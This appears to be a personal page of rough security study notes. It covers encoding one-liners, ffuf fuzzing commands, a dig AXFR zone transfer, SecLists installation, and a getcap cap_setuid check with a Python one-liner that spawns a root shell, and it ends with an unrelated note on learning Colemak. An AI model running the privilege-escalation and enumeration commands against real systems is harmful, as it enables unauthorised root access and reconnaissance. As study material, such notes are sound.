base64
echo 'test' | base64
echo 'dGVzdAo=' | base64 -d
hex
echo 'test' | xxd -p
echo '746573740a' | xxd -p -r
rot13
echo 'test' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
echo 'grfg' | tr 'A-Za-z' 'N-ZA-Mn-za-m'
🌱 Seedling notes
Early ideas, rough notes, and exploratory thoughts. These notes are incomplete and may not make sense yet, but I've decided to shamelessly publish them because I've decided they could be useful.
- unpacker ↗️
reverses jspacker. Signature
eval(function(p,a,c,k,e,r)
References
Some example ffuf commands
In each case, FUZZ is the placeholder for word replacement.**
Fuzzing for specific extensions
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u http://example.com/target_dir/FUZZ
-e .txt,.html,.bak # etc
Recursive fuzzing
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt \
-u http://example.com/target_dir/FUZZ \
-recursion
Fuzzing a POST parameter
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u http://example.com/example.php \
-X POST \
-H "Content-Type: application/x-www-form-urlencoded" \
-d "y=FUZZ"
-ic
Fuzzing a GET parameter
ffuf \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-u http://example.com/example.php?x=FUZZ \
-ic
References
You can do a DNS zone transfer using dig by using axfr
dig axfr @dns-server.com target.tld
This will return all dns records for target.tld. It’s intended to copy all records from a primary to secondary server and should only happen if trusted, but misconfigured servers may allow unauthorised transfers allowing for enumeration without brute forcing 🌿
.
The seclists from https://github.com/danielmiessler/SecLists ↗️ can be installed on Kali using apt
apt install seclists
They’re installed into /usr/share/seclists/
getcap is a program to get capabilities of others. The one which is a way in is cap_setuid
getcap -r / 2>/dev/null
If anything’s listed which lets you script, you can use that to get a shell. Here’s a Python example:
python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Just over a year ago I decided to bite the bullet and try out colemak. I’ve been at it full time on my Corne, by still using qwerty on traditional keyboards.
My findings:
- makes me a vim noob
- wpm has increased but plateaued because I want to retain qwerty memory
- what has been a success is Corne
- reflection: embrace qwerty and touch type on corne